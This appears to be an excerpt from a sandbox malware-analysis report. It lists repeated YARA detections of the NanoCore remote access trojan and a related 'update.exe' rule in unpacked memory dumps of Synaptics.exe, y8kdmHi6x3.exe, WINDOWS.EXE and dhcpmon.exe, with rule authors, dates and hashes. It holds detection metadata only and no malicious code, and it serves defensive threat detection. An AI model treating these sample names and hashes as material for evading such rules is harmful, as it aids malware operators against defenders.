            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
